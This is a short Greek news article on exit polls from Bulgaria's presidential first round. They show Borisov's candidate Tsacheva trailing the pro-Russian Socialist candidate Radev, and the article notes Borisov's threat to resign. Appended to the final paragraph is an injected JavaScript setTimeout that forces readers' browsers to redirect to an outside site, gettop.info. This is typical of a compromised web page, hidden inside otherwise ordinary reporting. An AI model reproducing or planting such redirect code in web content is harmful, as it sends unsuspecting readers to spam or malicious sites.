Εκλογική ανατροπή για τον Μπορίσοφ – Δεύτερη η υποψήφιά του

0
15

 

Πλήγμα υφίσταται ο πρωθυπουργός της Βουλγαρίας Μπόικο Μπορίσοφ από τα exit poll του πρώτου γύρου των προεδρικών εκλογών, όπου η υποψήφιά του Τσέτσκα Τσάτσεβα, πρόεδρος της Βουλής κατατάσσεται δεύτερη απέναντι στον φιλορωσικής κατεύθυνσης αντίπαλό της.

Η Τσάτσεβα, 58 ετών, εξασφαλίζει ανάμεσα στο 22,5% και το 23,5% των ψήφων και έρχεται πίσω από τον υποψήφιο των Σοσιαλιστών, ο πρώην αρχηγός της πολεμικής αεροπορίας της Βουλγαρίας Ρούμεν Ράντεφ, ο οποίος τάσσεται υπέρ της άρσης των ευρωπαϊκών κυρώσεων κατά της Ρωσίας και εξασφαλίζει ανάμεσα στο 24,3% και 26,7% των ψήφων.

Οι δημοσκοπήσεις προβλέπουν έναν αμφίρροπο δεύτερο γύρο, τη στιγμή που η ψηφοφορία θεωρείται τεστ για τον Μπόικο Μπορίσοφ και την κυβέρνησή του που βρίσκεται στο μέσον της θητείας της.

Ο συντηρητικός πρωθυπουργός, στην εξουσία από το 2014, είχε απειλήσει ότι θα παραιτηθεί και ότι θα προκηρύξει πρόωρες εκλογές εάν η υποψήφιά του δεν επικρατήσει στον πρώτο γύρο των προεδρικών εκλογών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here